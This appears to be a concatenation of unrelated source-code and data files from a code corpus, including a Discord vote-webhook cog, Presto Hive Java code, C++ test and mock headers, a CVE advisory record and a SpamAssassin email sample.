Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import dbl
from discord.ext import commands
from config import TOP_GG_TOKEN, EMOJIS
from utils.bot import EpicBot
class TopGG(commands.Cog):
    """Cog integrating with the top.gg (Discord Bot List) webhook API:
    announces upvotes in a fixed channel."""

    def __init__(self, client: EpicBot):
        self.client = client
        self.token = TOP_GG_TOKEN
        # Channel that receives the "thanks for voting" announcements.
        self.vote_c_id = 776015595354325002
        self.dblpy = dbl.DBLClient(
            self.client,
            self.token,
            webhook_path='/sus',
            webhook_auth='<PASSWORD>',  # placeholder scrubbed from the public repo
            webhook_port=8080
        )

    # this does not work
    # shocker
    @commands.Cog.listener()
    async def on_dbl_vote(self, data):
        """Fired by DBL when a user upvotes the bot."""
        user = self.client.get_user(data['user'])
        channel = self.client.get_channel(self.vote_c_id)
        await channel.send(f"Thank you {user.mention} for voting! {EMOJIS['heawt']}")

    @commands.Cog.listener()
    async def on_dbl_test(self, data):
        """Fired by DBL for test webhook payloads."""
        test_user = self.client.get_user(data['user'])
        # Fixed: was `self.clent`, which raised AttributeError on every test webhook.
        channel = self.client.get_channel(self.vote_c_id)
        await channel.send(f"webhooks works lmfao {test_user.mention}")
def setup(client):
    """discord.py extension entry point: register the TopGG cog."""
    cog = TopGG(client)
    client.add_cog(cog)
| 664 |
852 | <filename>IOPool/Input/test/test_empty_old_formats_cfg.py
# CMSSW configuration: re-read a ROOT file produced in an old format.
import FWCore.ParameterSet.Config as cms
import sys
# Process named OLDREAD; cmsRun drives this configuration.
process = cms.Process("OLDREAD")
# assumes the input file path is passed as the second command-line argument
# after the config file name — TODO confirm the argv index for the target
# CMSSW version (cmsRun argv handling changed across releases).
process.source = cms.Source("PoolSource",
                            fileNames = cms.untracked.vstring("file:"+sys.argv[2]))
| 117 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-8w58-xxg8-xq44",
"modified": "2022-05-01T06:47:13Z",
"published": "2022-05-01T06:47:13Z",
"aliases": [
"CVE-2006-1229"
],
"details": "SQL injection vulnerability in search.asp in Hosting Controller 6.1 (Hotfix 2.9) allows remote attackers to execute arbitrary SQL commands via the search parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-1229"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25140"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/19191"
},
{
"type": "WEB",
"url": "http://www.osvdb.org/23802"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2006/0914"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 508 |
619 | //
// Public.h
// Project
//
// Created by <NAME> on 11.07.17.
// Copyright © 2017 es.ppinera. All rights reserved.
//
#ifndef Public_h
#define Public_h
#endif /* Public_h */
| 71 |
1,137 | <reponame>jayten42/pororo<filename>tests/test_semantic_role_labeling.py
"""Test Semantic Role Labeling module"""
import unittest
from pororo import Pororo
class PororoSRLTester(unittest.TestCase):
    """Smoke test for the Korean semantic-role-labeling task."""

    def test_modules(self):
        # Loading the model once and labeling a single sentence is enough
        # to verify the task wiring end-to-end.
        labeler = Pororo(task="srl", lang="ko")
        result = labeler("카터는 역삼에서 카카오브레인으로 출근한다.")
        self.assertIsInstance(result, list)
if __name__ == "__main__":
    # Allow running this test module directly: `python test_semantic_role_labeling.py`.
    unittest.main()
| 217 |
9,782 | <reponame>willianfonseca/presto<filename>presto-hive/src/main/java/com/facebook/presto/hive/HiveZeroRowFileCreator.java
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.presto.hive;
import com.facebook.airlift.log.Logger;
import com.facebook.presto.common.io.DataOutput;
import com.facebook.presto.common.io.DataSink;
import com.facebook.presto.hive.datasink.DataSinkFactory;
import com.facebook.presto.hive.metastore.StorageFormat;
import com.facebook.presto.spi.ConnectorSession;
import com.facebook.presto.spi.PrestoException;
import com.google.common.collect.ImmutableList;
import com.google.common.util.concurrent.ListenableFuture;
import com.google.common.util.concurrent.ListeningExecutorService;
import io.airlift.slice.Slices;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator.RecordWriter;
import org.apache.hadoop.mapred.JobConf;
import javax.inject.Inject;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
import static com.facebook.airlift.concurrent.MoreFutures.getFutureValue;
import static com.facebook.presto.common.io.DataOutput.createDataOutput;
import static com.facebook.presto.hive.HiveCompressionCodec.NONE;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_CLOSE_ERROR;
import static com.facebook.presto.hive.HiveWriteUtils.initializeSerializer;
import static com.facebook.presto.hive.pagefile.PageFileWriterFactory.createEmptyPageFile;
import static com.facebook.presto.hive.util.ConfigurationUtils.configureCompression;
import static com.google.common.util.concurrent.Futures.whenAllSucceed;
import static com.google.common.util.concurrent.MoreExecutors.directExecutor;
import static java.lang.String.format;
import static java.nio.file.Files.deleteIfExists;
import static java.nio.file.Files.readAllBytes;
import static java.util.Objects.requireNonNull;
import static java.util.UUID.randomUUID;
/**
 * Creates zero-row ("empty") marker files for Hive tables or partitions.
 * A single empty file in the table's storage format is generated once in a
 * local temp directory and its bytes are then copied in parallel to every
 * requested destination file on the target file system.
 */
public class HiveZeroRowFileCreator
        implements ZeroRowFileCreator
{
    private static final Logger log = Logger.get(HiveZeroRowFileCreator.class);

    private final HdfsEnvironment hdfsEnvironment;
    private final DataSinkFactory dataSinkFactory;
    private final ListeningExecutorService executor;

    @Inject
    public HiveZeroRowFileCreator(
            HdfsEnvironment hdfsEnvironment,
            DataSinkFactory dataSinkFactory,
            @ForZeroRowFileCreator ListeningExecutorService zeroRowFileCreatorExecutor)
    {
        this.hdfsEnvironment = requireNonNull(hdfsEnvironment, "hdfsEnvironment is null");
        this.dataSinkFactory = requireNonNull(dataSinkFactory, "dataSinkFactory is null");
        this.executor = requireNonNull(zeroRowFileCreatorExecutor, "zeroRowFileCreatorExecutor is null");
    }

    /**
     * Writes one zero-row file per entry of {@code fileNames} into
     * {@code destinationDirectory}. The file content is generated once and the
     * copies are written concurrently; the first failure cancels the rest and
     * is rethrown.
     */
    @Override
    public void createFiles(ConnectorSession session, HdfsContext hdfsContext, Path destinationDirectory, List<String> fileNames, StorageFormat format, HiveCompressionCodec compressionCodec, Properties schema)
    {
        if (fileNames.isEmpty()) {
            return;
        }
        byte[] fileContent = generateZeroRowFile(session, hdfsContext, schema, format.getSerDe(), format.getOutputFormat(), compressionCodec);
        List<ListenableFuture<?>> commitFutures = new ArrayList<>();
        for (String fileName : fileNames) {
            commitFutures.add(executor.submit(() -> createFile(hdfsContext, new Path(destinationDirectory, fileName), fileContent, session)));
        }
        ListenableFuture<?> listenableFutureAggregate = whenAllSucceed(commitFutures).call(() -> null, directExecutor());
        try {
            getFutureValue(listenableFutureAggregate, PrestoException.class);
        }
        catch (RuntimeException e) {
            // Cancel remaining writes on the first failure before propagating.
            listenableFutureAggregate.cancel(true);
            throw e;
        }
    }

    /**
     * Produces the bytes of an empty file in the given output format by writing
     * a zero-row file to the local temp directory and reading it back.
     * The temp file is always deleted, even on failure.
     */
    private byte[] generateZeroRowFile(
            ConnectorSession session,
            HdfsContext hdfsContext,
            Properties properties,
            String serDe,
            String outputFormatName,
            HiveCompressionCodec compressionCodec)
    {
        String tmpDirectoryPath = System.getProperty("java.io.tmpdir");
        String tmpFileName = format("presto-hive-zero-row-file-creator-%s-%s", session.getQueryId(), randomUUID().toString());
        java.nio.file.Path tmpFilePath = Paths.get(tmpDirectoryPath, tmpFileName);
        try {
            Path target = new Path(format("file://%s/%s", tmpDirectoryPath, tmpFileName));
            //https://github.com/prestodb/presto/issues/14401 JSON Format reader does not fetch compression from source system
            JobConf conf = configureCompression(
                    hdfsEnvironment.getConfiguration(hdfsContext, target),
                    outputFormatName.equals(HiveStorageFormat.JSON.getOutputFormat()) ? compressionCodec : NONE);
            if (outputFormatName.equals(HiveStorageFormat.PAGEFILE.getOutputFormat())) {
                createEmptyPageFile(dataSinkFactory, session, target.getFileSystem(conf), target);
                return readAllBytes(tmpFilePath);
            }
            // Some serializers such as Avro set a property in the schema.
            initializeSerializer(conf, properties, serDe);
            // The code below is not a try with resources because RecordWriter is not Closeable.
            RecordWriter recordWriter = HiveWriteUtils.createRecordWriter(
                    target,
                    conf,
                    properties,
                    outputFormatName,
                    session);
            recordWriter.close(false);
            return readAllBytes(tmpFilePath);
        }
        catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        finally {
            try {
                deleteIfExists(tmpFilePath);
            }
            catch (IOException e) {
                log.error(e, "Error deleting temporary file: %s", tmpFilePath);
            }
        }
    }

    /**
     * Writes {@code content} to {@code path} on the destination file system
     * through a {@link DataSink}.
     */
    private void createFile(HdfsContext hdfsContext, Path path, byte[] content, ConnectorSession session)
    {
        try {
            FileSystem fs = hdfsEnvironment.getFileSystem(hdfsContext, path);
            try (DataSink dataSink = dataSinkFactory.createDataSink(session, fs, path)) {
                DataOutput dataOutput = createDataOutput(Slices.wrappedBuffer(content));
                dataSink.write(ImmutableList.of(dataOutput));
            }
        }
        catch (IOException e) {
            // BUG FIX: message previously read "Error write zero-row file to Hive".
            throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error writing zero-row file to Hive", e);
        }
    }
}
| 2,797 |
478 | /*
Q Light Controller - Unit tests
qlccapability_test.h
Copyright (C) <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0.txt
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#ifndef QLCCAPABILITY_TEST_H
#define QLCCAPABILITY_TEST_H
#include <QObject>
#include "qlccapability.h"
// Unit-test fixture for QLCCapability. Each private slot is executed as a
// separate test case by Qt's QTest framework.
class QLCCapability_Test : public QObject
{
    Q_OBJECT
private slots:
    // Default-constructed capability state.
    void initial();
    // Min/max DMX boundary accessors (the *_data slots feed data-driven rows).
    void min_data();
    void min();
    void max_data();
    void max();
    void middle();
    // Textual properties.
    void name();
    void alias();
    // Range-overlap detection between two capabilities.
    void overlaps();
    void copy();
    // XML (de)serialization, including malformed-input cases.
    void load();
    void loadWrongRoot();
    void loadNoMin();
    void loadNoMax();
    void loadMinGreaterThanMax();
    void save();
    void savePreset();
    void saveAlias();
};
#endif
| 402 |
634 | # To use jupytext in binder
# Jupyter server configuration for Binder: route notebook file I/O through
# jupytext so paired script files open as notebooks. NOTE: `c` is the config
# object injected by Jupyter when loading this file.
c.NotebookApp.contents_manager_class = 'jupytext.TextFileContentsManager' # noqa
# Read .py files in the percent (`# %%`) cell format.
c.ContentsManager.preferred_jupytext_formats_read = 'py:percent' # noqa
| 68 |
1,350 | <gh_stars>1000+
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.spring.cloud.context.core.util;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
/**
 * A heterogeneous, type-safe container: each entry is keyed by a {@link Class}
 * and holds an instance of exactly that type.
 */
public class TypeMap {

    private final Map<Class<?>, Object> registry = new HashMap<>();

    /**
     * Registers {@code instance} under {@code type}, replacing any previous entry.
     *
     * @param type the class key; must not be {@code null}
     * @param instance the instance to store
     * @param <T> the registered type
     */
    public <T> void put(Class<T> type, T instance) {
        registry.put(Objects.requireNonNull(type), instance);
    }

    /**
     * Returns the instance registered for {@code type}.
     *
     * @param type the class key
     * @param <T> the requested type
     * @return the stored instance, or {@code null} if none was registered
     */
    public <T> T get(Class<T> type) {
        Object stored = registry.get(type);
        return type.cast(stored);
    }
}
| 355 |
356 | /**
* @author sunjianfei
* 此包包含了图片展示的各种样式,这些样式用户不必手动创建和调用,
* 可直接通过,ZjbImageLoader.create(url).setDisplayType(ZjbImageLoader.DISPLAY_SIMPLE)方式确定
*/
package com.zjb.loader.core.display; | 149 |
4,879 | package com.mapswithme.maps.purchase;
import androidx.annotation.StringRes;
import com.mapswithme.maps.R;
/**
 * Pages of the "all pass" bookmarks subscription promo screen. Each page is a
 * pair of string resources: a title and a subtitle shown beneath it.
 */
public enum BookmarksAllSubscriptionPage
{
  GUIDES(R.string.all_pass_subscription_message_title,
         R.string.all_pass_subscription_message_subtitle),
  BOOKMARKS(R.string.all_pass_subscription_message_title_3,
            R.string.all_pass_subscription_message_subtitle_3),
  ELEVATION(R.string.all_pass_subscription_message_title_2,
            R.string.all_pass_subscription_message_subtitle_2),
  LONELY(R.string.all_pass_subscription_message_title_4,
         R.string.all_pass_subscription_message_subtitle_4);

  @StringRes
  private final int titleId;
  @StringRes
  private final int descriptionId;

  BookmarksAllSubscriptionPage(@StringRes int titleId, @StringRes int descriptionId)
  {
    this.titleId = titleId;
    this.descriptionId = descriptionId;
  }

  /** @return string resource id of the page title */
  @StringRes
  public int getTitleId()
  {
    return titleId;
  }

  /** @return string resource id of the page subtitle */
  @StringRes
  public int getDescriptionId()
  {
    return descriptionId;
  }
}
| 388 |
634 | package com.intellij.openapi.roots.ui.configuration.projectRoot.daemon;
import com.intellij.icons.AllIcons;
import com.intellij.openapi.module.Module;
import com.intellij.openapi.roots.DependencyScope;
import com.intellij.openapi.util.text.StringUtil;
import consulo.roots.ui.configuration.ModulesConfigurator;
import consulo.ui.image.Image;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
* @author nik
*/
public class UsageInModuleClasspath extends ProjectStructureElementUsage {
  private final ModulesConfigurator myModulesConfigurator;
  private final ModuleProjectStructureElement myContainingElement;
  // Dependency scope of the order entry, or null when no scope applies.
  @Nullable
  private final DependencyScope myScope;
  private final ProjectStructureElement mySourceElement;
  private final Module myModule;

  // Represents one usage of sourceElement (e.g. a library) inside the
  // classpath of the module wrapped by containingElement.
  public UsageInModuleClasspath(@Nonnull ModulesConfigurator modulesConfigurator,
                                @Nonnull ModuleProjectStructureElement containingElement,
                                ProjectStructureElement sourceElement,
                                @Nullable DependencyScope scope) {
    myModulesConfigurator = modulesConfigurator;
    myContainingElement = containingElement;
    myScope = scope;
    myModule = containingElement.getModule();
    mySourceElement = sourceElement;
  }

  @Override
  public ProjectStructureElement getSourceElement() {
    return mySourceElement;
  }

  @Override
  public ModuleProjectStructureElement getContainingElement() {
    return myContainingElement;
  }

  public Module getModule() {
    return myModule;
  }

  @Override
  public String getPresentableName() {
    // The usage is displayed under the name of the module whose classpath holds it.
    return myModule.getName();
  }

  @Override
  public PlaceInProjectStructure getPlace() {
    return new PlaceInModuleClasspath(myModulesConfigurator, myModule, myContainingElement, mySourceElement);
  }

  // equals/hashCode identity is (module, source element); the scope and the
  // configurator are deliberately excluded.
  @Override
  public int hashCode() {
    return myModule.hashCode()*31 + mySourceElement.hashCode();
  }

  @Override
  public boolean equals(Object obj) {
    return obj instanceof UsageInModuleClasspath && myModule.equals(((UsageInModuleClasspath)obj).myModule)
           && mySourceElement.equals(((UsageInModuleClasspath)obj).mySourceElement);
  }

  @Override
  public Image getIcon() {
    return AllIcons.Nodes.Module;
  }

  @Override
  public void removeSourceElement() {
    // NOTE(review): removal of a library order entry is currently disabled
    // (commented out below) — this override is intentionally a no-op.
    if (mySourceElement instanceof LibraryProjectStructureElement) {
      //ModuleStructureConfigurable.getInstance(myModule.getProject())
      //  .removeLibraryOrderEntry(myModule, ((LibraryProjectStructureElement)mySourceElement).getLibrary());
    }
  }

  // Shows the non-default dependency scope, e.g. "[test]"; null hides the suffix.
  @Nullable
  @Override
  public String getPresentableLocationInElement() {
    return myScope != null && myScope != DependencyScope.COMPILE ? "[" + StringUtil.decapitalize(myScope.getDisplayName()) + "]" : null;
  }
}
| 911 |
379 | <filename>src/test/java/com/sixt/service/framework/kafka/EagerMessageQueueTest.java
package com.sixt.service.framework.kafka;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.junit.Before;
import org.junit.Test;
import org.mockito.ArgumentCaptor;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
/**
 * Unit tests for {@code EagerMessageQueue}: records added to the queue must be
 * handed to the {@link MessageExecutor} immediately and in insertion order.
 */
public class EagerMessageQueueTest {

    private MessageExecutor messageExecutor;
    private MessageQueue messageQueue;
    private String topic = "topic";
    private String defaultKey = "key";
    private String defaultValue = "value";

    @Before
    public void setup() {
        messageExecutor = mock(MessageExecutor.class);
        // 5000 ms: generous rebalance/processing timeout; irrelevant to these tests.
        messageQueue = new EagerMessageQueue(messageExecutor, 5000);
    }

    @Test
    public void queue_addTwoRecord_allExecuted() {
        // IMPROVEMENT: use parameterized ConsumerRecord<String, String>
        // instead of the raw type, eliminating unchecked-conversion warnings.
        ConsumerRecord<String, String> record1 = new ConsumerRecord<>(topic, 0, 0, defaultKey, defaultValue);
        messageQueue.add(record1);
        ConsumerRecord<String, String> record2 = new ConsumerRecord<>(topic, 0, 0, defaultKey, defaultValue);
        messageQueue.add(record2);

        ArgumentCaptor<ConsumerRecord> captor = ArgumentCaptor.forClass(ConsumerRecord.class);
        verify(messageExecutor, times(2)).execute(captor.capture());
        // Eager queue executes synchronously, preserving insertion order.
        assertThat(captor.getAllValues().get(0)).isEqualTo(record1);
        assertThat(captor.getAllValues().get(1)).isEqualTo(record2);
    }
}
| 531 |
1,738 | /*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#pragma once
#include <IConsole.h>
#include <AzTest/AzTest.h>
#include <SFunctor.h>
#pragma warning( push )
#pragma warning( disable: 4373 ) // virtual function overrides differ only by const/volatile qualifiers, mock issue
// GoogleMock stub of the engine console-variable interface (ICVar), used by
// unit tests that need to observe or script CVar interactions.
class CVarMock
    : public ICVar
{
public:
    MOCK_METHOD0(Release, void());
    // Value accessors (int / int64 / float / string).
    MOCK_CONST_METHOD0(GetIVal, int());
    MOCK_CONST_METHOD0(GetI64Val, int64());
    MOCK_CONST_METHOD0(GetFVal, float());
    MOCK_CONST_METHOD0(GetString, const char*());
    MOCK_CONST_METHOD0(GetDataProbeString, const char*());
    // Value mutators; Set is overloaded per value type.
    MOCK_METHOD1(Set, void(const char*));
    MOCK_METHOD1(ForceSet, void(const char*));
    MOCK_METHOD1(Set, void(const float));
    MOCK_METHOD1(Set, void(const int));
    // Flag manipulation.
    MOCK_METHOD1(ClearFlags, void(const int));
    MOCK_CONST_METHOD0(GetFlags, int());
    MOCK_METHOD1(SetFlags, int(const int));
    // Metadata.
    MOCK_METHOD0(GetType, int());
    MOCK_CONST_METHOD0(GetName, const char*());
    MOCK_METHOD0(GetHelp, const char*());
    MOCK_CONST_METHOD0(IsConstCVar, bool());
    // Change-notification callbacks/functors.
    MOCK_METHOD1(SetOnChangeCallback, void(ConsoleVarFunc));
    MOCK_METHOD1(AddOnChangeFunctor, uint64(const SFunctor& pChangeFunctor));
    MOCK_CONST_METHOD0(GetNumberOfOnChangeFunctors, uint64());
    MOCK_CONST_METHOD1(GetOnChangeFunctor, const SFunctor&(uint64));
    MOCK_METHOD1(RemoveOnChangeFunctor, bool(uint64));
    MOCK_CONST_METHOD0(GetOnChangeCallback, ConsoleVarFunc());
    MOCK_CONST_METHOD1(GetMemoryUsage, void(class ICrySizer* pSizer));
    MOCK_CONST_METHOD0(GetRealIVal, int());
    // Numeric range limits.
    MOCK_METHOD2(SetLimits, void(float, float));
    MOCK_METHOD2(GetLimits, void(float&, float&));
    MOCK_METHOD0(HasCustomLimits, bool());
#if defined(DEDICATED_SERVER)
    MOCK_METHOD1(SetDataProbeString, void(const char*));
#endif
};
#pragma warning( pop )
| 856 |
3,428 | <filename>lib/node_modules/@stdlib/datasets/spam-assassin/data/easy-ham-2/01276.2492bcd768a07a92ee22c4762db629a2.json
{"id":"01276","group":"easy-ham-2","checksum":{"type":"MD5","value":"2492bcd768a07a92ee22c4762db629a2"},"text":"From <EMAIL> Wed Aug 21 18:16:30 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id DC38243C38\n\tfor <jm@localhost>; Wed, 21 Aug 2002 13:16:16 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Wed, 21 Aug 2002 18:16:16 +0100 (IST)\nReceived: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net\n [2192.168.127.1252]) by dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id\n g7LHH2Z02984 for <<EMAIL>>; Wed, 21 Aug 2002 18:17:02 +0100\nReceived: from usw-sf-list1-b.sourceforge.net ([10.3.1.13]\n helo=usw-sf-list1.sourceforge.net) by usw-sf-list2.sourceforge.net with\n esmtp (Exim 3.31-VA-mm2 #1 (Debian)) id 17hZ5V-0000Qp-00; Wed,\n 21 Aug 2002 10:16:09 -0700\nReceived: from alpha.exit0.org.1-254.250.190.207.in-addr.arpa\n ([172.16.31.10] helo=alpha.exit0.org) by usw-sf-list1.sourceforge.net\n with smtp (Exim 3.31-VA-mm2 #1 (Debian)) id 17hZ55-0007tT-00 for\n <<EMAIL>>; Wed, 21 Aug 2002 10:15:43 -0700\nReceived: (qmail 16304 invoked by uid 7794); 21 Aug 2002 17:17:38 -0000\nReceived: from <EMAIL> by alpha by uid 7791 with\n qmail-scanner-1.13 (spamassassin: 2.31. Clear:. Processed in 0.018966\n secs); 21 Aug 2002 17:17:38 -0000\nReceived: from outbound.infosysinc.com (HELO shiva.infosysinc.com)\n (172.16.31.10) by 0 with SMTP; 21 Aug 2002 17:17:38 -0000\nSubject: Re: [SAtalk] CONFIDENTIAL\nFrom: \"f. 
<NAME>\" <<EMAIL>>\nTo: <EMAIL>\nIn-Reply-To: <<EMAIL>>\nReferences: <1<EMAIL>-1<EMAIL>>\nContent-Type: text/plain\nContent-Transfer-Encoding: 7bit\nX-Mailer: Ximian Evolution 1.0.3 (1.0.3-6)\nMessage-Id: <1029935708.2998.1.camel@shiva>\nMIME-Version: 1.0\nSender: <EMAIL>\nErrors-To: <EMAIL>\nX-Beenthere: <EMAIL>\nX-Mailman-Version: 2.0.9-sf.net\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: <https://example.sourceforge.net/lists/listinfo/spamassassin-talk>,\n <mailto:<EMAIL>?subject=subscribe>\nList-Id: Talk about SpamAssassin <spamassassin-talk.example.sourceforge.net>\nList-Unsubscribe: <https://example.sourceforge.net/lists/listinfo/spamassassin-talk>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://www.geocrawler.com/redir-sf.php3?list=spamassassin-talk>\nX-Original-Date: 21 Aug 2002 13:15:07 +0000\nDate: 21 Aug 2002 13:15:07 +0000\n\nOn Wed, 2002-08-21 at 06:42, <NAME> wrote:\n> On Tuesday, August 20, 2002, at 09:38 PM, <NAME> wrote:\n> \n> > Of course, since I have this list before my SA filter, it got through.\n> \n> That's exactly what they're counting on! Actually, I think it's \n> more likely spammer humor, and sa-talk is on a list somewhere.\n> \n\nOh, I dunno. Humor or not it, lets some of us with new installs test out\nSA with \"real\" email.\n\n:)\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone? Get a new here for FREE!\nhttps://www.inphonic.com/r.asp?r=sourceforge1&refcode1=vs3390\n_______________________________________________\nSpamassassin-talk mailing list\n<EMAIL>\nhttps://lists.sourceforge.net/lists/listinfo/spamassassin-talk\n\n"} | 1,483 |
1,144 | package de.metas.dunning.model;
/** Generated Interface for C_DunningDoc_Line_Source
 *
 *  NOTE: this file is code-generated from the table metadata (AD_Table).
 *  Do not edit by hand — manual changes will be lost on regeneration.
 *
 * @author Adempiere (generated)
 */
@SuppressWarnings("javadoc")
public interface I_C_DunningDoc_Line_Source
{
	/** TableName=C_DunningDoc_Line_Source */
	public static final String Table_Name = "C_DunningDoc_Line_Source";
	/** AD_Table_ID=540403 */
	// public static final int Table_ID = org.compiere.model.MTable.getTable_ID(Table_Name);
	// org.compiere.util.KeyNamePair Model = new org.compiere.util.KeyNamePair(Table_ID, Table_Name);
	/** AccessLevel = 3 - Client - Org
	 */
	// java.math.BigDecimal accessLevel = java.math.BigDecimal.valueOf(3);
	/** Load Meta Data */
	/**
	 * Get Client (Mandant).
	 * The client/tenant this record belongs to.
	 *
	 * <br>Type: TableDir
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getAD_Client_ID();
	public org.compiere.model.I_AD_Client getAD_Client();
	/** Column definition for AD_Client_ID */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Client> COLUMN_AD_Client_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Client>(I_C_DunningDoc_Line_Source.class, "AD_Client_ID", org.compiere.model.I_AD_Client.class);
	/** Column name AD_Client_ID */
	public static final String COLUMNNAME_AD_Client_ID = "AD_Client_ID";
	/**
	 * Set Organization (Sektion).
	 * Organizational unit of the client.
	 *
	 * <br>Type: TableDir
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setAD_Org_ID (int AD_Org_ID);
	/**
	 * Get Organization (Sektion).
	 * Organizational unit of the client.
	 *
	 * <br>Type: TableDir
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getAD_Org_ID();
	public org.compiere.model.I_AD_Org getAD_Org();
	public void setAD_Org(org.compiere.model.I_AD_Org AD_Org);
	/** Column definition for AD_Org_ID */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Org> COLUMN_AD_Org_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Org>(I_C_DunningDoc_Line_Source.class, "AD_Org_ID", org.compiere.model.I_AD_Org.class);
	/** Column name AD_Org_ID */
	public static final String COLUMNNAME_AD_Org_ID = "AD_Org_ID";
	/**
	 * Set Dunning Candidate (Mahnungsdisposition).
	 *
	 * <br>Type: Search
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setC_Dunning_Candidate_ID (int C_Dunning_Candidate_ID);
	/**
	 * Get Dunning Candidate (Mahnungsdisposition).
	 *
	 * <br>Type: Search
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getC_Dunning_Candidate_ID();
	public de.metas.dunning.model.I_C_Dunning_Candidate getC_Dunning_Candidate();
	public void setC_Dunning_Candidate(de.metas.dunning.model.I_C_Dunning_Candidate C_Dunning_Candidate);
	/** Column definition for C_Dunning_Candidate_ID */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_Dunning_Candidate> COLUMN_C_Dunning_Candidate_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_Dunning_Candidate>(I_C_DunningDoc_Line_Source.class, "C_Dunning_Candidate_ID", de.metas.dunning.model.I_C_Dunning_Candidate.class);
	/** Column name C_Dunning_Candidate_ID */
	public static final String COLUMNNAME_C_Dunning_Candidate_ID = "C_Dunning_Candidate_ID";
	/**
	 * Set Dunning Document Line.
	 *
	 * <br>Type: Search
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setC_DunningDoc_Line_ID (int C_DunningDoc_Line_ID);
	/**
	 * Get Dunning Document Line.
	 *
	 * <br>Type: Search
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getC_DunningDoc_Line_ID();
	public de.metas.dunning.model.I_C_DunningDoc_Line getC_DunningDoc_Line();
	public void setC_DunningDoc_Line(de.metas.dunning.model.I_C_DunningDoc_Line C_DunningDoc_Line);
	/** Column definition for C_DunningDoc_Line_ID */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_DunningDoc_Line> COLUMN_C_DunningDoc_Line_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_DunningDoc_Line>(I_C_DunningDoc_Line_Source.class, "C_DunningDoc_Line_ID", de.metas.dunning.model.I_C_DunningDoc_Line.class);
	/** Column name C_DunningDoc_Line_ID */
